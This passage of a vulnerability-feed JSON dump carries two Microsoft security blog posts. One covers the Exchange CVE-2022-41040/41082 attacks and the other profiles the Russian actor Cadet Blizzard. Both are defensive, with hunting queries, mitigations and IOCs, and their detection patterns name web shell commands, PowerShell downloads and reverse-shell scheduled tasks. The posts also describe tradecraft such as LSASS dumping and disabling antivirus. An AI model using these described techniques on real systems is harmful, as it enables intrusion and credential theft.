\n[Trojan:Win32/WebShellTerminal.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.B&threatId=-2147138186>) | Execution \n \n### Microsoft Defender for Endpoint\n\n[Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/security/business/endpoint-security/microsoft-defender-endpoint>) detects post-exploitation activity. The following alerts could be related to this threat:\n\n**Indicators of attack******| **MITRE** **ATT&CK Tactics observed ** \n---|--- \nPossible web shell installation | Persistence \nPossible IIS web shell | Persistence \nSuspicious Exchange Process Execution | Execution \nPossible exploitation of Exchange Server vulnerabilities (Requires Exchange AMSI to be enabled)| Initial Access \nSuspicious processes indicative of a web shell | Persistence \nPossible IIS compromise | Initial Access \n \nAs of this writing, Defender for Endpoint customers with Microsoft Defender Antivirus enabled can also detect the web shell malware used in in-the-wild exploitation of this vulnerability with the following alerts:\n\n**Indicators of attack******| **MITRE ATT&CK Tactics observed ** \n---|--- \n'Chopper' malware was detected on an IIS Web server | Persistence \n'Chopper' high-severity malware was detected | Persistence \n \n### Microsoft Defender Threat Intelligence\n\n[Microsoft Defender Threat Intelligence](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-defender-threat-intelligence>) (MDTI) maps the internet to expose threat actors and their infrastructure. As indicators of compromise (IOCs) associated with threat actors targeting the vulnerabilities described in this writeup are surfaced, Microsoft Defender Threat Intelligence Community members and customers can find summary and enrichment information for all IOCs within the Microsoft Defender Threat Intelligence portal.\n\n### Microsoft Defender Vulnerability Management\n\nMicrosoft Defender Vulnerability Management identifies devices in an associated tenant environment that might be affected by CVE-2022-41040 and CVE-2022-41082. These vulnerabilities have been added to the CISA known exploited vulnerabilities list and are considered in the overall organizational [exposure score](<https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score?view=o365-worldwide>). Customers can use the following capabilities to identify vulnerable devices and assess exposure:\n\n * Use the dedicated dashboard for each of CVE-2022-41040 and CVE-2022-41082 to get a consolidated view of various findings across vulnerable devices and software.\n * Use the _DeviceTvmSoftwareVulnerabilities_ table in advanced hunting to identify vulnerabilities in installed software on devices. Refer to the following query to run:\n \n \n DeviceTvmSoftwareVulnerabilities\n | where CveId in (\"CVE-2022-41040\", \"CVE-2022-41082\")\n \n\nFigure 2: Screenshot of the CVE information page where users can also take a look at related exposed device, software information, open vulnerability page, report inaccuracy, or read other useful references.\n\nNOTE: The assessments above do not currently account for the existence of a workaround mitigation on the device. Microsoft will continue to improve these capabilities based on the latest information from the threat landscape.\n\n## Advanced hunting\n\n### Microsoft Sentinel\n\nBased on what we\u2019re seeing in the wild, Microsoft Sentinel customers can use the following techniques for web shell-related attacks connected to these vulnerabilities. Our post on [web shell threat hunting with Microsoft Sentinel](<https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968>) also provides guidance on looking for web shells in general. \n\nThe [Exchange SSRF Autodiscover ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/08a8d2b9c5c9083e341be447773a34b56b205dee/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>) detection, which was created in response to ProxyShell, can be used for queries due to functional similarities with this threat. Also, the new [Exchange Server Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>) and [Exchange Worker Process Making Remote Call](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/ExchangeWorkerProcessMakingRemoteCall.yaml>) queries specifically look for suspicious downloads or activity in IIS logs. In addition to these, we have a few more that could be helpful in looking for post-exploitation activity:\n\n * [Exchange OAB virtual directory attribute containing potential web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/ExchangeOABVirtualDirectoryAttributeContainingPotentialWebshell.yaml>) \n * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/WebShellActivity.yaml>) \n * [Malicious web application requests linked with Microsoft Defender for Endpoint alerts](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/MaliciousAlertLinkedWebRequests.yaml>) \n * [Exchange IIS worker dropping web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Execution/exchange-iis-worker-dropping-webshell.yaml>) \n * [Web shell detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/PotentialWebshell.yaml>) \n\n### Microsoft 365 Defender\n\nTo locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:\n\n**Chopper web shell**\n\nUse this query to hunt for Chopper web shell activity:\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"w3wp.exe\"\n | where ProcessCommandLine has_any (\"&ipconfig&echo\", \"&quser&echo\", \"&whoami&echo\", \"&c:&echo\", \"&cd&echo\", \"&dir&echo\", \"&echo [E]\", \"&echo [S]\")\n \n\n**Suspicious files in Exchange directories**\n\nUse this query to hunt for suspicious files in Exchange directories:\n \n \n DeviceFileEvents\n | where Timestamp >= ago(7d)\n | where InitiatingProcessFileName == \"w3wp.exe\"\n | where FolderPath has \"FrontEnd\\\\HttpProxy\\\\\"\n | where InitiatingProcessCommandLine contains \"MSExchange\"\n | project FileName,FolderPath,SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp\n\n## External attack surface management\n\n### Microsoft Defender External Attack Surface Management\n\n[Microsoft Defender External Attack Surface Management](<https://www.microsoft.com/en-us/security/business/cloud-security/microsoft-defender-external-attack-surface-management>) continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. Attack Surface Insights are generated by leveraging vulnerability and infrastructure data to showcase the key areas of concern for your organization.\n\nA High Severity Observation has been published to surface assets within an attack surface which should be examined for application of the mitigation steps described above. This insight, titled _CVE-2022-41082 & CVE-2022-41040 - Microsoft Exchange Server Authenticated SSRF and PowerShell RCE_, can be found under the high severity observations section of the Attack Surface Summary dashboard.\n\nThe post [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T04:21:00", "type": "mmpc", "title": "Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T04:21:00", "id": "MMPC:C857BFAD4920FD5B25BF42D5469945F6", "href": "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-23T23:55:14", "description": "As Russia\u2019s invasion of Ukraine continues into its second year and Microsoft continues to collaborate with global partners in response, the exposure of destructive cyber capabilities and information operations provide greater clarity into the tools and techniques used by Russian state-sponsored threat actors. Throughout the conflict, Russian threat actors have deployed a variety of destructive capabilities with varying levels of sophistication and impact, which showcase how malicious actors rapidly implement novel techniques during a hybrid war, along with the practical limitations of executing destructive campaigns when significant operational errors are made and the security community rallies around defense. These insights help security researchers continuously refine detection and mitigation capabilities to defend against such attacks as they evolve in a wartime environment.\n\nToday, Microsoft Threat Intelligence is sharing updated details about techniques of a threat actor formerly tracked as [DEV-0586](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>)\u2014a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard. As a result of our investigation into their intrusion activity over the past year, we have gained high confidence in our analysis and knowledge of the actor\u2019s tooling, victimology, and motivation, meeting the criteria to convert this group to a [named threat actor](<https://www.microsoft.com/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/>). \n\nMicrosoft assesses that Cadet Blizzard operations are [associated with the Russian General Staff Main Intelligence Directorate (GRU)](<https://blogs.microsoft.com/on-the-issues/2023/06/14/russian-cyberattacks-ukraine-cadet-blizzard/>) but are separate from other known and more established GRU-affiliated groups such as Forest Blizzard (STRONTIUM) and Seashell Blizzard (IRIDIUM). While Microsoft constantly tracks a number of activity groups with varying degrees of Russian government affiliation, the emergence of a novel GRU affiliated actor, particularly one which has conducted destructive cyber operations likely supporting broader military objectives in Ukraine, is a notable development in the Russian cyber threat landscape. A month before Russia invaded Ukraine, Cadet Blizzard foreshadowed future destructive activity when it created and deployed [WhisperGate](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>), a destructive capability that wipes Master Boot Records (MBRs), against Ukrainian government organizations. Cadet Blizzard is also linked [to the defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of several Ukrainian organization websites, as well as multiple operations, including the hack-and-leak forum known as \u201cFree Civilian\u201d.\n\nMicrosoft has tracked Cadet Blizzard since the deployment of WhisperGate in January 2022. We assess that they have been operational in some capacity since at least 2020 and continue to perform network operations through the present. Operationally consistent with the remit and assessed objectives of GRU-led operations throughout Russia\u2019s invasion of Ukraine, Cadet Blizzard has engaged in focused destructive attacks, espionage, and information operations in regionally significant areas. Cadet Blizzard\u2019s operations, though comparatively less prolific in both scale and scope to more established threat actors such as Seashell Blizzard, are structured to deliver impact and frequently run the risk of hampering continuity of network operations and exposing sensitive information through targeted hack-and-leak operations. Primary targeted sectors include government organizations and information technology providers in Ukraine, although organizations in Europe and Latin America have also been targeted.\n\nMicrosoft has been [working with CERT-UA](<https://blogs.microsoft.com/on-the-issues/2022/11/03/our-tech-support-ukraine/#:~:text=Since%20the%20war%20began%20in%20February%2C%20Microsoft%20and,critical%20Ukrainian%20services%20through%20data%20centers%20across%20Europe.>) closely since the beginning of Russia\u2019s war in Ukraine and continues to support the country and neighboring states in protecting against cyberattacks, such as the ones carried out by Cadet Blizzard. As with any observed nation-state actor activity, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with the information they need to guide their investigations. Microsoft is also actively working with members of the global security community and other strategic partners to share information that can address this evolving threat through multiple channels. Having elevated this activity to a distinct threat actor name, we\u2019re sharing this information with the larger security community to provide insights to protect and mitigate Cadet Blizzard as a threat. Organizations should actively take steps to protect environments against Cadet Blizzard, and this blog further aims to discuss how to detect and prevent disruption.\n\n## Who is Cadet Blizzard?\n\nCadet Blizzard is a Russian GRU-sponsored threat group that Microsoft began tracking following disruptive and destructive events occurring at multiple government agencies in Ukraine in mid-January 2022. During this time, Russian troops backed with tanks and artillery were surrounding the Ukrainian border as the military prepped for an offensive attack. The [defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of key Ukrainian institutions\u2019 websites, coupled with the WhisperGate malware, prefaced [multiple waves of attacks](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd>) by Seashell Blizzard that followed when the Russian military began their ground offensive a month later.\n\nCadet Blizzard compromises and maintains a foothold on affected networks for months, often exfiltrating data prior to disruptive actions. Microsoft observed Cadet Blizzard\u2019s activity peak between January and June 2022, followed by an extended period of reduced activity. The group re-emerged in January 2023 with increased operations against multiple entities in Ukraine and in Europe, including another round of website defacements and a new \u201cFree Civilian\u201d Telegram channel affiliated with the hack-and-leak front under the same name that first emerged in January 2022, around the same time as the initial defacements. Cadet Blizzard actors are active seven days of the week and have conducted their operations during their primary European targets\u2019 off-business hours. Microsoft assesses that NATO member states involved in providing military aid to Ukraine are at greater risk.\n\nFigure 1. A heatmap of the operational cadence of Cadet Blizzard\n\nCadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion. While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard. Additionally, as is the case with other Russian state-sponsored threat groups, Microsoft assesses that at least one Russian private sector organization has materially supported Cadet Blizzard by providing operational support including during the WhisperGate destructive attack.\n\n### Targets\n\nCadet Blizzard\u2019s operations are global in scope but consistently affect regional hotspots in Ukraine, Europe, Central Asia, and, periodically, Latin America. Cadet Blizzard likely prioritizes target networks based on requirements consistent with Russian military or intelligence objectives such as geolocation or perceived impact. Cadet Blizzard, consistent with a Russian military-associated threat actor, continues to mainly target Ukraine, although the relative scope of impact of Cadet Blizzard\u2019s destructive activity is minimal compared to the multiple waves of destructive attacks that we attribute to Seashell Blizzard. In January 2022, Cadet Blizzard launched destructive attacks in Ukraine in the following industry verticals:\n\n * Government services\n * Law enforcement\n * Non-profit/non-governmental organization\n * IT service providers/consulting\n * Emergency services\n\nCadet Blizzard has repeatedly targeted information technology providers and software developers that provide services to government organizations using a supply chain \u201ccompromise one, compromise many\u201d technique. The group\u2019s January 2022 compromise of government entities in Ukraine probably were at least in part due to access and information gained during a breach of an information technology provider that often worked with these organizations.\n\nPrior to the war in Ukraine, Cadet Blizzard performed historical compromises of several Eastern European entities as well, primarily affecting the government and technology sectors as early as April 2021. As the war continues, Cadet Blizzard activity poses an increasing risk to the broader European community, specifically any successful attacks against governments and IT service providers, which may give the actor both tactical and strategic-level insight into Western operations and policy surrounding the conflict. Gaining heightened levels of access into these targeted sectors may also enable Cadet Blizzard to carry out retaliatory demonstrations in opposition to the West\u2019s support for Ukraine.\n\n### Tools, tactics, and procedures\n\nCadet Blizzard is a conventional network operator and commonly utilizes living-off-the-land techniques after gaining initial access to move laterally through the network, collect credentials and other information, and deploy defense evasion techniques and persistence mechanisms. Unlike other Russian-affiliated groups that historically prefer to remain undetected to perform espionage, the result of at least some notable Cadet Blizzard operations are extremely disruptive and are almost certainly intended to be public signals to their targets to achieve the larger objective of destruction, disruption, and possibly, intimidation.\n\nFigure 2. Cadet Blizzard's normal operational lifecycle\n\n**Initial access**\n\nCadet Blizzard predominantly achieves initial access through exploitation of web servers commonly found on network perimeters and DMZs. Cadet Blizzard is also known for exploiting Confluence servers through the CVE-2021-26084 vulnerability, Exchange servers through multiple vulnerabilities including CVE-2022-41040 and ProxyShell, and likely commodity vulnerabilities in various open-source platforms such as content management systems.\n\n**Persistence**\n\nCadet Blizzard frequently persists on target networks through the deployment of commodity web shells used either for commanding or tunneling. Commonly utilized web shells include [P0wnyshell](<https://github.com/flozz/p0wny-shell>), [reGeorg](<https://github.com/sensepost/reGeorg>), PAS, and even custom variants included in publicly available exploit kits.\n\nIn February 2023, [CERT-UA reported](<https://cert.gov.ua/article/3947787>) an attempted attack against a Ukrainian state information system that involved a variant of the PAS web shell, which Microsoft assesses to be unique to Cadet Blizzard operations at the time of the intrusion.\n\n**Privilege escalation and credential harvesting** \nCadet Blizzard has leveraged a variety of living-off-the-land techniques to conduct privilege escalation and harvesting of credentials.\n\n * Dumping LSASS \u2013 Cadet Blizzard uses Sysinternals tools such as _procdump_ to dump LSASS in suspected offline credential harvesting efforts. Cadet Blizzard frequently renames _procdump64_ to alternative names, such as _dump64.exe_.\n * Dumping registry hives \u2013 Cadet Blizzard extracts registry hives using native means via _reg save_.\n\n**Lateral movement** \nCadet Blizzard conducts lateral movement with valid network credentials obtained from credential harvesting. To conduct lateral movement more efficiently, Cadet Blizzard typically uses modules from the publicly available [Impacket framework](<https://github.com/fortra/impacket>). While this framework is generically utilized by multiple actors, preferential execution of patterns of commands may allow for more precision profiling of Cadet Blizzard operations:\n\n * PowerShell _get-volume_ to enumerate the volume of a device\nFigure 3. PowerShell _get-volume_ command\n\n * Copying critical registry hives that contain password hashes and computer information\nFigure 4. Copying critical registry hives\n\n * Downloading files directly from actor-owned infrastructure via the PowerShell _DownloadFile_ commandlet\nFigure 5. PowerShell _DownloadFile_ commandlet\n\n**Command execution and C2**\n\nCadet Blizzard periodically uses generic socket-based tunneling utilities to facilitate command and control (C2) to actor-controlled infrastructure. Payloads such as NetCat and Go Simple Tunnel (GOST) are commonly renamed to blend into the operating system but are used to shovel interactive command prompts over established sockets. Frequently, remote command execution may be facilitated through remotely scheduled tasks. The group has also sparingly utilized Meterpreter.\n\nFigure 6. Scheduled task creating a reverse shell\n\n**Operational security**\n\nCadet Blizzard utilizes anonymization services IVPN, SurfShark, and Tor as their anonymization layer during select operations.\n\n**Anti-forensics** \nCadet Blizzard has been observed leveraging the _Win32_NTEventlogFile_ commandlet in PowerShell to extract both system and security event logs to an operational directory. The activities are anticipated to be consistent with anti-forensics activities.\n\n * Common file targets during extraction are:\n * _sec.evtx_\n * _sys.evtx_\n * Cadet Blizzard commonly deletes files used during operational phases seen in lateral movement.\n * Cadet Blizzard malware implants are known to disable Microsoft Defender Antivirus through a variety of means:\n * _NirSoft AdvancedRun_ utility, which is used to disable Microsoft Defender Antivirus by stopping the _WinDefend_ service.\n * _Disable Windows Defender.bat,_ which presumably disables Microsoft Defender Antivirus via the registry.\nFigure 7. Addition of registry key to disable Microsoft Defender Antivirus\n\n**Impact assessment**\n\nCadet Blizzard typically collects information en-masse from targeted servers. If mail servers are affected, Cadet Blizzard typically attempts to collect mail, placing incident response communications at risk. Credential material (such as SSH keys) are also a common target to provide methods for re-entry if a full remediation does not occur. As was the case with the WhisperGate operation in January 2022, Cadet Blizzard is known to deploy destructive malware to select target environments to delete data and render systems inoperable.\n\nAlso in January of 2022, Microsoft identified that data exfiltrated by Cadet Blizzard in compromises of various Ukrainian organizations was leaked on a Tor .onion site under the name \u201cFree Civilian.\u201d The organizations from which data was leaked strongly correlated to multiple Cadet Blizzard compromises earlier in 2022, leading Microsoft to assess that this forum is almost certainly linked to Cadet Blizzard. In February 2023, a new Telegram channel was established under the same \u201cFree Civilian\u201d moniker, suggesting that Cadet Blizzard intends to continue conducting information operations in the second year of the war. However, the public channel only has 1.3K followers with posts getting at most a dozen reactions as of the time of publication, signifying low user interaction. A private channel assumed to be operated by the same group appears to have shared data with 748 of those subscribers.\n\nFigure 8. Free Civilian hack-and-leak front\n\n### Related ecosystems\n\nCadet Blizzard operations do not occur in a silo; there have been substantial technical indicators of intersection with other malicious cyber activity that may have a broader scope or a nexus outside of Russia. They have at times utilized services associated with these ecosystems such as Storm-0587, discussed below, as well as having support from at least one private sector enabler organization within Russia. Though there have been various forms of intersections in threat activity, when these groups have been observed operating independently, the tactics, techniques, procedures (TTPs) and capabilities have often been distinct\u2014therefore making it operationally valuable to distinguish these activity groups.\n\n**Storm-0587**\n\nStorm-0587 is a cluster of activity beginning as early as April 2021 involving a series of weaponized documents predominantly delivered in phishing operations usually to distribute a series of downloaders and [document stealers](<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>). One of Storm-0587's trademark tools is [SaintBot](<https://www.malwarebytes.com/blog/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader>), an uncommon downloader that often appears in spear-phishing emails. This downloader can be customized to deploy almost anything as the payload, but in Ukraine, the malware often deploys a version of an [AutoIT information stealer](<https://gist.github.com/malwarezone/119bed274bc77b52122fa118f0a72618#file-stealer-au3-L2880>) that collects documents on the machine that threat actors deem of interest. This specific version of the malware has been named [OUTSTEEL by CERT UA](<https://cert.gov.ua/article/18419>) and has been observed in several attacks, such as a fake version of the Office of the President of Ukraine\u2019s website created in July 2021 that hid weaponized documents, including OUTSTEEL, that would download onto victim\u2019s machines when the documents are clicked.\n\n## Mitigation and protection guidance\n\n### Defending against Cadet Blizzard\n\nActivities linked to Cadet Blizzard indicate that they are comprehensive in their approach and have demonstrated an ability to hold networks at risk of continued compromise for an extended period of time. A comprehensive approach to incident response may be required in order to fully remediate from Cadet Blizzard operations. Organizations can bolster security of information assets and expedite incident response by focusing on areas of risk based on actor tradecraft enumerated within this report. Use the included indicators of compromise to investigate environments and assess for potential intrusion.\n\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Enable [controlled folder access (CFA)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/controlled-folders>) to prevent MBR/VBR modification.\n * [Block process creations originating from PSExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-process-creations-originating-from-psexec-and-wmi-commands>) to stop lateral movement utilizing the WMIexec component of Impacket.\n * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus, turned on by default in Windows, or the equivalent for your chosen antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n\n### Hunting for Cadet Blizzard hands-on-keyboard activity\n\nTo uncover malicious hands-on-keyboard activities in environments, identify any unusual or unexpected commands or tools launched on systems as well as the presence of any unusual directories or files that could be used for staging or storing malicious tools. Use the common commands, tools, staging directories, and indicators of compromise listed below to help identify Cadet Blizzard intrusion and hands-on-keyboard activity in environments.\n\n**Common commands**\n\n * _systeminfo_ to fingerprint a device after lateral movement\n * _get-volume_ to fingerprint a device after lateral movement\n * _nslookup_ to research specific devices (IP) and FQDNs internally\n * _Get-DnsServerResourceRecord_ to conduct reconnaissance of an internal DNS namespace\n * _query session_ to profile RDP connections\n * _route print_ to enumerate routes available on the devices\n * _DownloadFile_ via PowerShell to download payloads from external servers\n\n**Common tool staging directories**\n\n * _C:\\ProgramData_\n * _C:\\PerfLogs_\n * _C:\\Temp_\n * _C:\\_\n * Subdirectories of legitimate (or fake) user accounts within _%APPDATA%\\Temp_\n * Subdirectories with the name _USOPublic _in the path\n\n**Common tools**\n\n * Tor\n * Python\n * SurfShark\n * Teamviewer\n * Meterpreter named as _dbus-rpc.exe_ in known instances\n * IVPN\n * NGROK\n * _GOST.exe_ frequently masked as _USORead.exe_****\n * regeorg web shell\n\n**Indicators of compromise (IOCs)**\n\nIOC| Type| Description \n---|---|--- \njusticeua[.]org| Domain| Sender for non-weaponized emails containing only antagonistic messaging: _volodimir_azov@justiceua[.]org_ \n179.43.187[.]33| IP address| Hosted the JusticeUA operation between March and April 2022 \n3a2a2de20daa74d8f6921230416ed4e6| PE Import Hash| PE Import Hash matching WhisperGate malware \n3e4bb8089657fef9b8e84d9e17fd0d7740853c4c0487081dacc4f22359bade5c| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n20215acd064c02e5aa6ae3996b53f5313c3f13625a63da1d3795c992ea730191| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n3fe9214b33ead5c7d1f80af469593638b9e1e5f5730a7d3ba2f96b6b555514d4| SHA-256| Web shell - WSO Shell (not unique to Cadet Blizzard) \n23d6611a730bed886cc3b4ce6780a7b5439b01ddf6706ba120ed3ebeb3b1c478| SHA-256| Web shell \u2013 reGeorg (not unique to Cadet Blizzard) \n7fedaf0dec060e40cbdf4ec6d0fbfc427593ad5503ad0abaf6b943405863c897| SHA-256| Web shell \u2013 PAS (may not be unique to Cadet Blizzard) \n \n### Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects behavioral components of techniques this threat actor uses as the following:\n\n * Behavior:Win32/WmiprvseRemoteProc\n\nMicrosoft Defender Antivirus detects the WhisperGate malware attributed to this threat actor with the following family:\n\n * WhisperGate\n\n**Microsoft Defender for Endpoint**\n\nThe following Microsoft Defender for Endpoint alerts can indicate associated threat activity:\n\n * Cadet Blizzard activity detected\n * Possible Storm-0587 activity detected\n\nThe following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.\n\n * Ongoing hands-on-keyboard attack via Impacket toolkit\n * Suspicious PowerShell command line\n * Suspicious WMI process creation\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-26084\n * CVE-2020-1472\n * CVE-2021-4034\n\n### Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks:\n\nCheck for WMIExec Impacket activity with common Cadet Blizzard commands\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"WmiPrvSE.exe\" and FileName =~ \"cmd.exe\"\n | where ProcessCommandLine matches regex \"2>&1\"\n | where ProcessCommandLine has_any (\"get-volume\",\"systeminfo\",\"reg.exe\",\"downloadfile\",\"nslookup\",\"query session\",\"route print\")\n \n\nFind PowerShell file downloads\n \n \n DeviceProcessEvents\n | where FileName == \"powershell.exe\" and ProcessCommandLine has \"DownloadFile\"\n \n\nScheduled task creation, command execution and C2 communication\n \n \n DeviceProcessEvents \n | where Timestamp > ago(14d) \n | where FileName =~ \"schtasks.exe\" \n | where (ProcessCommandLine contains \"splservice\" or ProcessCommandLine contains \"spl32\") and \n (ProcessCommandLine contains \"127.0.0.1\" or ProcessCommandLine contains \"2>&1\")\n \n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u201cTI map\u201d) to automatically match indicators associated with Cadet Blizzard in Microsoft Defender Threat Intelligence (MDTI) with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the MDTI connector and analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>.\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list above.\n\n * [Web Shell Activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web Shells Threat Protection/Hunting Queries/WebShellActivity.yaml>)\n * [Commands executed by WMI](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows Security Events/Hunting Queries/CommandsexecutedbyWMIonnewhosts-potentialImpacket.yaml>)\n * [Potential Impacket Execution](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker Tools Threat Protection Essentials/Hunting Queries/PotentialImpacketExecution.yaml>)\n * [Dumping LSASS using procdump](<https://github.com/Azure/Azure-Sentinel/blob/ccbb0e644810e0edf3b8ee4f284fd05ea1cc46ad/Hunting%20Queries/Microsoft%20365%20Defender/Credential%20Access/procdump-lsass-credentials.yaml>)\n * [Potential Microsoft Defender Tampering](<https://github.com/Azure/Azure-Sentinel/blob/c5e3281a8a30ea658ce8f8234a182a63ceb996d7/Hunting%20Queries/Microsoft%20365%20Defender/Defense%20evasion/PotentialMicrosoftDefenderTampering%5BSolarigate%5D.yaml>)\n\n### References\n\n * <https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>\n * <https://github.com/flozz/p0wny-shell>\n * <https://github.com/sensepost/reGeorg>\n * <https://cert.gov.ua/article/3947787>\n * <https://github.com/fortra/impacket>\n * <https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>\n\n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>.\n\nThe post [Cadet Blizzard emerges as a novel and distinct Russian threat actor](<https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-06-14T16:00:00", "type": "mmpc", "title": "Cadet Blizzard emerges as a novel and distinct Russian threat actor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-26084", "CVE-2021-4034", "CVE-2022-41040"], "modified": "2023-06-14T16:00:00", "id": "MMPC:1AFF4881941FA1030862F773DC84A4A8", "href": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 